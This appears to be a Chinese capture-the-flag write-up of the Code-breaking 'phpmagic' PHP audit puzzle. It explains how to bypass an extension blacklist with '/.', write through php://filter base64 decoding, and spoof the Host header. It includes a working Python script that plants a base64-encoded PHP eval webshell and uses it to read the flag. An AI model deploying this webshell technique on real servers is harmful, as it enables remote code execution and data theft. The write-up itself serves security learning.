Code-breaking 平台 PHPmagic 代码审计

代码审计

easy - phpmagic

来自: https://code-breaking.com/puzzle/3/

题目给出了源码:

<?php
    if(isset($_GET['read-source'])) {
        exit(show_source(__FILE__));
    }

    define('DATA_DIR', dirname(__FILE__) . '/data/'.md5($_SERVER['REMOTE_ADDR']));
    
    if(!is_dir(DATA_DIR)) {
        mkdir(DATA_DIR, 0755, true);
    }
    chdir(DATA_DIR);
    
    $domain = isset($_POST['domain']) ? $_POST['domain'] : '';
    $log_name = isset($_POST['log']) ? $_POST['log'] : date('-Y-m-d');
?>

<?php 
    if(!empty($_POST) && $domain):
       $command = sprintf("dig -t A -q %s", escapeshellarg($domain));
       $output = shell_exec($command);

       $output = htmlspecialchars($output, ENT_HTML401 | ENT_QUOTES);

       $log_name = $_SERVER['SERVER_NAME'] . $log_name;
       if(!in_array(pathinfo($log_name, PATHINFO_EXTENSION), ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'], true)) {
           file_put_contents($log_name, $output);
       }

       echo $output;
    endif; 
 ?>

分析代码流程:通过post上传查询参数,执行后将结果写入文件,并回显。

思路:1.直接执行系统命令,将结果回显;2.将php一句话木马写入文件后,传参执行。

因为有escapeshellarg函数限制命令执行,所以考虑第二种思路。

第二种方法中,output被htmlspecialchars函数转马,导致php标签损坏,日志文件名由 SERVER_NAME 和log_name两部分拼接而成,两部分均可控,但拼接出的文件名需要绕过pathinfo函数的黑名单检测。因此,bypass分为三部分。

1.pathinfo函数后缀名黑名单绕过

尝试php黑魔法 "/." bypass, 即上传文件名为 “a.php/.”,php在做路径处理的时候,会递归的删除掉路径中存在的“/.”

2.htmlspecialchars函数过滤‘< >’绕过

file_put_contents函数可接受php://伪协议作为参数,php://filter可对输入进行base64转码,可以通过上传base64编码过的php一句话绕过标签过滤,在写文件时将$output内容写入 php://filter/write=convert.base64-decode/resource=a.php/.进行解码并落地为a.php

注意:这里是将$output变量整体decode,因此base64的payload最后不能以=结尾,需将=替换为a

3.路径控制

a.因为log文件的文件名由_SERVER['SERVERNAME']和log_name拼接而成,因此需要控制超全局变量$_SERVER['SERVERNAME']的值,抓包发现该值为http请求中的Host值,可使用Burp修改。

b.路径为'/data/'.md5($_SERVER['REMOTE_ADDR']),REMOTE_ADDR为本机出口IP地址。可计算出路径:/data/6fac6e0fd12500e4867464626edcdfdd/

实现脚本:

import requests
url = "http://106.14.114.127:24004"
headers = {
    'Host':'php'
}
data = {
    'domain':"PD9waHAgQGV2YWwoJF9HRVRba2V5XSk7Pz4a",
    'log':"://filter/write=convert.base64-decode/resource=asd.php/."
}
r = requests.post(url,headers=headers,data=data)

#url2 = url+"/data/6fac6e0fd12500e4867464626edcdfdd/asd.php?    key=var_dump(scandir('../../../'));"

url2 = url+"/data/6fac6e0fd12500e4867464626edcdfdd/asd.php? key=readfile('../../../flag_phpmag1c_ur1');"

res = requests.get(url2)
print res.content

得到flag:flag{8fd9046cde2d53d1ceea8970286fd38c}

知识点:

  1. 使用/.绕过php后缀名黑名单过滤
  2. 伪协议文件名,php://filter/write=convert.base64-decode/resource=a.php 转码绕过内容过滤
  3. 超全局变量SERVER_NAME可控,为http头的Host字段
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,193评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,306评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,130评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,110评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,118评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,085评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,007评论 3 417
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,844评论 0 273
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,283评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,508评论 2 332
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,667评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,395评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,985评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,630评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,797评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,653评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,553评论 2 352

推荐阅读更多精彩内容